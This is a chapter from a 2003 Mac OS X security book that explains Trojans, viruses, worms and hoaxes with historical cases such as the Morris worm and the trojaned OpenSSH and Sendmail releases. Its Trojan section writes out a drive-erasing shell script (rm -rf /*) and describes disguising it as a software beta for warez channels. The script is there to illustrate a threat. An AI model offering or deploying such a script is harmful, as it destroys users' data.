# Malware

Malware typically tends to be subcategorized into Trojans, Viruses, and Worms, which are discussed in the following sections. The terms are frequently misused in the lay literature, and this is only partially due to a lack of comprehension on the part of those misusing them. With increasing frequency, malware is blurring the lines between these by functioning in multiple modes, or by working on the boundary of areas where operating systems and utility software is automating tasks that were previously the realm of user behavior.

## ROBERT MORRIS STARTED IT ALL

To be sure, there were viruses, Trojans, and worms before Robert Morris scratched his head and said, "Huh, they couldn't have been that dumb" (or something to that effect), and wrote a bit of software to test what he perceived to be a flaw in the design of the predominant Internet mail-delivery system. Robert, however, ushered in, in an almost prophetic way, the current age of Internet insecurity. When he released his test code, it got away. It got away in a big, bad way, and it started breaking systems that were part of the backbone of the Internet. When he realized what was happening, Robert tried to release information to sites on how they could neutralize it, but unfortunately , his test worm broke the mailing infrastructure for the Internet, and his message did not get though until the damage was done. Robert was eventually convicted of violation of the Computer Fraud and Abuse Act, and sentenced to three years of probation, four hundred hours of community service, and a fine of $10,500 (http://sunland.gsfc.nasa.gov/ info /guide/The_Internet_Worm.html). Although his act was certainly irresponsible, many think it's hard to justify the sentence in context. What Robert did, almost any one of us looking at network security at the time could have ended up doing. It was inevitable that someone would notice the fault, and in a climate where the concept of network- borne self-replicating code was novel , it was almost as inevitable that whoever noticed the possibility would test it, just to be sure he wasn't seeing things. To be sure, today's network viruses and worms are malicious software, written by at the best uncaring, and more probably truly evil persons. If the perpetrators could be found,$10,500 would be a slap on the wrist compared to what they deserve. By all the evidence, however, Robert's worm, the one that started it all, was an experiment gone accidentally and terribly wrong.

#### Trojans

Trojans, or (sometimes Trojan horses) are applications that claim to do one thing, while in fact doing something else, usually something malicious. Trojans get their name from the famous Trojan horse of ancient Greek history, by which the Greek army overcame the impenetrable fortress of Troy by the subterfuge of a troop carrier disguised as a horse-shaped monument, and given as a gift. Trojans are not typically self-replicating, instead relying on the gullibility or malice of humans to distribute them to other systems. The malicious payload of Trojan software can be almost anything that can be believably packaged into something that looks, at least at first glance, like a beneficial application. There have been games that were actually Trojan installers for viruses, shell scripts that were Trojan installers of back doors into systems, even mail servers and security software applications that were actually malicious security exploits that attacked other systems on the network.

Writing a Trojan is abysmally simple work. If you were to write the following shell script and distribute it on the Web or through email (or better yet, through some facility such as Hotline or Carracho, where software pirates who are out looking for "WaReZ" live) to people as iDVD4_Beta4.tgz , you'd undoubtedly end up erasing a number of drives .

 #!/bin/tcsh -f /bin/rm -rf /* >& /dev/null & exit 1

If you make it executable, tar and gzip it, the vast majority of people who download it without looking at the size are likely to run it without ever looking inside to see what's lurking there. If you're concerned that they might think something's up because the file is so much smaller than what one might expect, just tack on a pile of junk comments at the bottom. If you really want to be massively nasty, use something like ScriptGUI (available from http://homepage.mac.com/cnorris/ScriptGUI/) and wrap it up as a Scriptlet so that it's convenient for people to run it by double-clicking in the Finder.

If you make it big enough to be believable, package it as a double-clickable application so that it can be downloaded, decompressed with UnStuffit, and run by double-clicking in the Finder, and then distribute it in an appropriate 0-day ("zero day," as in "fresh") warez group , the thieving little leeches (http://www.catb.org/jargon/html/entry/leech.html) will probably trade it around for days before someone catches on to what it's doing and still has enough computer left to tell anyone about it.

The fact that Trojans are so trivially simple to construct, and users are so ready to believe and execute almost any application that's handed to them is what makes Trojans such a threat. If users (and system administrators) lived by the adages never install any software as root , and never install any software that you haven't read the code for yourself , Trojans would be stopped almost dead in their tracks. The first of these admonitions is moderately painful, especially given the way that most OS manufacturers (including Apple) are packaging nonvendor components in what should be vendor-only directories, but it is one that you should strive to obey. As a matter of fact, you should avoid running any software as root , for which root isn't absolutely required (this includes avoiding the use of sudo ). Running software installers as root , however, offers a prime way for Trojan software to do massive damage to your system or install back doors for crackers to use for other mischief.

It's impractical to obey the sanction against never installing anything you've not read the code for, but implicit in the fact that you acknowledge this impracticality is an understanding that you will, at some point, be running software (installers and applications) on your system for which you really have no idea what they're going to do. This should worry you, and unless you have a very good reason to trust some particular application or installer, you probably should explicitly think about the fact that you're tossing the dice, and hoping that it's not a Trojan. Sometimes the dice come up craps; I've seen it happen. A network administrator I've worked with rolled the dice on an unverified copy of tcpwrappers (in its normal state a wonderful security suite that we've discussed in several places in this book), and ended up costing his company three months of system downtime while they tried to recover from the mess caused by the Trojan he had installed.

Two popular Open Source packages have recently been Trojaned. In July 2002, version 3.4p1 of the OpenSSH package, which is covered in Chapter 14, "Remote Access: Secure Shell, VNC, Timbuktu, Apple Remote Desktop," was Trojaned. Fortunately, because the developers noticed a different checksum for the distribution, the Trojan was discovered quickly. In the Trojan version, the makefile included code that when compiled opened a channel on port 6667, an IRC port, to a specific machine. It could then open a shell running as the user who compiled the program. In September 2002, Sendmail 8.12.6 was also Trojaned. The Sendmail Trojan was similar to the OpenSSH Trojan. It contained code that was executed at compile time, and also opened an IRC channel to a specific, already cracked host. Unlike the OpenSSH incident, about a week had gone by before the Trojan was discovered . In this case, sendmail.org's FTP server was modified so that the Trojan code was distributed with every 10 downloads without ever modifying the original package. The owner of the cracked machine that the Trojan used as a communications hub lost all of his data, about seven or eight years' worth, including financial records, when the controller of the Trojan tried to erase his tracks. Although these recent Trojan examples didn't cause local damage to the machines with the installed Trojans, they do show that some of the most important software we rely on can indeed be Trojaned. The next time, the Trojans could be more malicious and not just inconvenient. You can read more about these Trojans at http://www.securityfocus.com/news/560 and http://www.securityfocus.com/news/1113.

#### Viruses

Viruses are microapplications that can embed themselves in documents or software in such a way that when the documents are opened or the software run, the microapplication is also allowed to run. When executed in this fashion, the virus replicates itself into other documents or applications. A key feature to note is that viruses are self-replicating, but require some action on the part of a user to become active and to propagate. In the early days of personal computers, viruses lived in assorted application files or in various file system structures on floppy disks and replicated either when the documents were opened or by the action of reading the floppy. Propagation, however, was solely by the transfer of files from one computer to another, or in the case of floppy-embedded viruses, by the transfer of a floppy disk itself. Today, viral embeddings are similar, but email attachments are allowing viral distribution to proceed considerably faster and further than was ever possible with floppy-borne viruses. Viruses typically carry some executable payload in addition to their self-replicating functions. This payload is often malicious in nature, but a number of viruses have been written in which the payload was intended to be nothing more than an amusing pop-up message or screen display on a certain date.

Unfortunately, although considerable benefits could be gained from such a system for propagating useful software updates, the real problems inherent to it are considerable, and are likely to outweigh the possible benefits by a distinct margin. Probably the most serious practical complaint is the simple fact that there would be no way to prevent authors of malicious viruses from claiming that their viruses were beneficial, essentially Trojaning a bad virus into the system under the guise of a friendly update.

One of the most insidious aspects of viruses is that they're effectively run by you (or whatever user is executing the software containing the virus or reading the document), whether you (or they) know it or not. This gives viruses the permission to do whatever you have permission to do, and to pretend to other applications and systems that they are doing it with your authorization. This means that if you've run an infected application, whatever that virus does, it's just done it with all the authorizations and permissions you have. If you want to avoid viruses in your email sending copies of themselves to every person in your address book and masquerading as you having done it, you need to stay away from email software that's susceptible to viruses. If you don't, the email viruses you receive will have free run to do whatever you can do with your permission .

A virus that you have probably encountered was the Sircam virus, which was especially prevalent during the summer of 2001. The virus was propagated in email. It attempted to send itself and local documents to the users listed in the Windows Address Book and to any email addresses left in a users' Web browser cache. A message, in either English or Spanish, containing the Sircam virus, indicated that it was asking for your advice. As a Mac user, you probably found this junk mail a bit annoying, but your Windows friends may have experienced local damage, including loss of their data or their hard drive space filling up. You can find out more about this virus at http://vil.nai.com/vil/content/v_99141.htm.

More recently, in October 2002 the Bugbear virus was prevalent. However, as a Mac user, you may not even have noticed it because the virus normally propagated itself in email messages with a variety of names and content, although it could also propagate via network shares. It contained a Trojan that could disable antivirus and firewall processes, provide access to a remote attacker, and log keystrokes. Consequently, it could potentially email confidential information from the recipient's email account. You can find out more about this virus at http://vil.nai.com/vil/content/v_99728.htm and http://www.securityfocus.com/news/925.

#### Worms

Worms are much like self-propagating viruses that do not require any human interaction to allow them to move from system to system or to replicate. Worms also do not require a "host" application in which to embed themselves, though they often propagate themselves by wrapping themselves in some document for the purpose of transmission. With the advent of email applications that automatically execute code contained in email messages, we now see a class of malware that is difficult to categorize cleanly between these types. They are self-propagating only as a result of wildly poor programming and configuration decisions, essentially allowing the mail client to act as the user and autoexecute content, and would function only as viruses without the benefit of this brain-damaged programming. Similarly, there are autoexecute capabilities provided by most modern operating systems for a variety of types of removable media, which would allow a proper worm to distribute itself via sneakernet (http://www.catb.org/jargon/html/entry/sneakernet.html) , if only it could think up a way to get itself onto a Zip disk or CDR without needing to hide in an already-existing data file.

Most issues with worms are comparable to virus issues, with the predominant difference being that worms don't necessarily run as (aren't always run by) normal users. Worms typically deliver themselves via the network, and although some have recently done so by using users' email clients , it's also common for them to do so by using system-level facilities. If the service that the worm is using to propagate has root permissions, the worm will have root permission when it runs.

A couple recent worms that you have probably heard about include the Code Red worm and the SQL Slammer worm. In the summer of 2001 two variants of the Code Red worm regularly made the headlines. Code Red exploited buffer overflow vulnerabilities in Microsoft's IIS web server. On an infected machine the worm existed only in memory, making it difficult for a victim machine to detect its presence. However, infected machines often contained a defaced Web page stating that they had been "Hacked By Chinese." After the worm had infected a machine, it searched for other vulnerable systems to infect . This resulted in network slowdown . If you were running a non-IIS Web server at the time, you discovered that your Web server's logs were growing with requests for the file default.ida . You can read more about this worm on the various antivirus vendor and news sites.

#### Hoaxes

Although not actually a type of malware, various Internet hoaxes are sometimes almost as damaging as actual malicious software. It's not at all uncommon for emails warning of the great and impending danger of some virus to make its way around the network almost as fast as a real virus, and to disrupt network and computer usage nearly as effectively. Most often these are messages like the Good Times warning, telling the user of some dangerous email virus that they must delete immediately if they see it in their mailboxes. The warnings then go on to suggest that the user forward the message to as many people as they can, so that the rest of the world can be similarly saved. When this happens, network administrators typically suffer from receiving hundreds upon hundreds of useless copies of the warning, diluting the information they have for finding the real ongoing problems of the system. In a twistedly amusing sense, many email virus hoaxes function as viruses themselves. The "software" that they invade to get themselves replicated is the stuff in the human skull, but the effect is the same: They show up, convince something to replicate them, and then pop off to infect other units that can replicate them further. For this reason it's useful to consider hoaxes in the general scheme of malware, even though the operating system they run on is the human brain.

Some viruses or worms, though, may seem to be hoaxes, but are really malicious software. For example, one of the variants of the Klez worm can send itself in an email message that claims that it is a free immunity tool to defend systems against itself. The worm exploits a vulnerability in Internet Explorer that enables it to infect a machine when an email message that contains it is opened or previewed, but even in a system where Explorer or Outlook Express aren't executing code without a user's permission, the claim that the software is beneficial can be sufficient to cause the gullible to execute it themselves. Klez can propagate via network shares by copying itself into RAR archives, and by sending itself to addresses in the Windows Address Book. When it propagates by email it often includes a local file as an attachment, possibly sending sensitive information. It can also disable antivirus software. You can read more about Klez at the various antivirus software vendor sites.

## THE PRICE OF CONVENIENCE

Interestingly, until recently (or until the late 1990s, at least), any email warning of an email-borne virus that you "had to delete immediately without looking at it" was generally considered a hoax. Until then, email applications would open messages and tell you that you had an attachment. They'd give you the option to save it, and then you could open it in the appropriate application. Email warnings of things such as the Good Times virus (a hoax) would start propagating, and you'd turn to CERT and plain as day would be a general advisory that viruses weren't known to propagate automatically through email.Not since Richard Morris demonstrated that mailers with autoexecute capability were a Bad Idea had anyone been blitheringly stupid enough to allow an email application to automatically execute arbitrary software that was delivered to it over the wire. Then came Microsoft Outlook and Microsoft Explorer, and everything changed.

Although melissa (http://securityresponse. symantec .com/avcenter/venc/data/w97m.melissa.a.html) wasn't the first email virus, it's the first time I remember getting a message to "Watch out for this email virus, and mail this warning on to all your friends," that when I turned to CERT to check the status of the world, I found a warning saying, "This time it's real, guys!" I still remember the sinking feeling in the pit of my stomach as I deleted my long-standing explanation of viruses, worms, and the fact that there was no need to panic because users were safe from infection so long as they simply avoided running software or opening documents that appeared in their mail. I'd been mailing that explanation to calm my users and cut down on the repeated mailings of random hoaxes around the college for nearly 10 years, and here was a virus that blew it all away. Maddeningly, it wasn't that the virus or virus writers had gotten smarter , it was that the programmers who wrote the software, or the marketroids that controlled the features the programmers added, had put their companies' bottom lines above the safety and security of their customers and all other users on the Internet, and they'd made their software stupider. They removed the essential protection that network clients should never be allowed to execute code without the user's permission, and they'd set the default behavior in their software to do exactly the wrong thing.

The rest, as they say, is history. One outbreak of the Morris worm was enough to teach the Internet to use secure (or at least not blatantly vulnerable) mailing software for nearly 10 years. Four years after Melissa debuted (and according to Symantec, in certain variants she's still going strong), we're still stuck in a world where some email clients pathologically insist on doing something that no sane programmer would ever let an email client do.

Hoaxes, however, aren't limited to virus warnings. One still sees occasional flurries of emails asking for kindly donation of get-well postcards sent to Craig Shergold, a boy dying of cancer in England who wanted to be in the Guinness book records for having received the most cards. The initial request went out in 1989, and by 1991 he was not only in the book, but also cured. The emails requesting postcards, and, of course, that the request be again forwarded to as many people as the recipient can, however, refuse to die. To date, some 200 million postcards have been received, and Craig's house has had to be assigned the British equivalent of its own ZIP code (http://www. snopes .com/inboxer/children/shergold.htm).

Like real viruses, this one is spread by humans, from human to human, and it mutates along the way. There are now a number of variants circulating the Net, requesting postcards be sent to various places around the world. One directs people to send them to the Cincinnati Shriner's Hospital in Cincinnati, Ohio, where they're now down to only 10,000 or so pieces of unwanted mail per week from their high of 50,000 per week in mid-2001.

Some of the computer-related hoaxes don't even need computers to spread. Our published news sources, always looking for a juicy tidbit to use in fearmongering about technology they don't understand, or to toss mud in the face of the "evil" government often practically trip over each other to print unverified misinformation if it's juicy enough. In one notable 1992 case regarding Operation Desert Storm/Desert Shield, U.S. News and World Report ran a story "Triumph Without Victory: The Unreported History of the Persian Gulf War," in which they reported that the National Security Agency had intercepted computer printers bound for Iraq and inserted chips into them that made the printers give Iraqi computers viruses, which then shut down their air defense system during Operation Desert Storm. The report was picked up by a number of news services and widely distributed as fact. TV anchor Ted Koppel even opened a Nightline broadcast with news of this dastardly U.S. subterfuge. Put aside the absolute gullibility required to believe that the NSA had somehow come up with all the necessary information, software, and probably black magic required to get a bug in a printer to shut down the Iraqi air defense system. Then you still have to accept that after they managed all this engineering they had no better way to deliver the payload than through a French printer that was intercepted by chance. The fact still remains that an almost identical story was run the year before in Infoworld, as an April Fool's joke (http://www.vmyths.com/hoax.cfm?id=123&page=3 and http://catless.ncl.ac.uk/Risks/13.06.html#subj3).

#### Other Stuff

A host of other applications might be considered malware in certain circumstances that we won't be mentioning here. For example, a keystroke logger being run by one of your users without permission is certainly a poison pill. It's not, however, in the context of what we're going to discuss in this chapter, as it's under the relatively direct control of another person and isn't acting autonomously. These applications are covered in the various chapters that detail the vulnerability types that they exploit. Keystroke loggers, because they're most useful for stealing passwords, are covered in Chapter 5, "Picking Locks: Password Attacks," with the rest of the password security-related material.

On the other hand, there are many situations where software may do you harm, without it being malware in any sense. If you've mistakenly typed \rm -rf /* at the prompt, the rm command isn't a Trojan, and it's not malware. The system is simply going to eviscerate itself at your command. If you weren't aware of what rm was going to do, that's not rm 's fault ”the man pages are very clear.

Likewise, a bug in a program doesn't make it malware. The exceedingly poor interaction between Tenon's original XTools for OS X release, and the then-current version of Apple's installer (an interaction which corrupted the system so badly that nothing short of wiping the drive and doing a clean install seemed to fix it) was a bug, not an incident of either Tenon's software or Apple's installer being malware.

Finally, there is malware that's not actually capable of doing damage or harm. Often this is because it was written on a different platform, or with the expectation of different installed software, leaving it dormant on your system. For Macintosh users, the vast majority of email-borne viruses and worms fall into this category today, because the software has been written to function on a Windows platform, and on the Mac it's just nonsensical garbage. Usually these types of malware are dormant on an incompatible host, but can come to life again if they are transferred from the incompatible host to another that they were designed to operate on. There are also instances of broken malware ”software that's designed to invade or damage your system, but that's so poorly designed or written that it can't perform its intended function. Frequently, this is a good thing because it prevents the software from causing the damage that it otherwise would. For example, the old Antibody HyperCard virus was intended to remove the MerryXmas HyperCard virus, but it could trigger an error that would cause your stack to quit. Sometimes, though, errors of the exact same nature turn a bit of malware that didn't have an intentionally damaging payload into an actually harmful threat. For example, the old INIT17 virus was a benign virus that when triggered should have done nothing more than display a message that read, "From the Depths of CyberSpace." However, on 68k Macs, it caused crashes.

 Top

Maximum Mac OS X Security
ISBN: 0672323818
EAN: 2147483647
Year: 2003
Pages: 158